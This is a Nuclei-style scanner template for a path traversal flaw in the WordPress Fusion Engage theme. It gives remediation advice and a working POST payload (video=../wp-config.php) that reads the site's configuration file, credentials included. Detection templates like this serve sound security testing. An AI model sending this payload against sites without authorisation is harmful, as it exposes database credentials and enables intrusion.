id: Wordpress-Fusion_Engage_Plugins-FileDisclosure
info:
  name: WordPress Fusion Engage Local File Disclosure
  author:
  - l0ne1y
  description: |-
    WordPress Theme Fusion Engage directory traversal leads to file download vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    The WordPress Fusion Engage theme has a path traversal vulnerability that allows a remote attacker to read arbitrary files in the system via the video parameter.
  reference:
  - https://www.bugscan.net/#!/x/21614
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/themes/

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: dsl
    dsl:
    - ' contains(body,"The base configurations of the WordPress") && status_code==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/admin-ajax.php'
  method: POST
  body: action=fe_get_sv_html&video=../wp-config.php
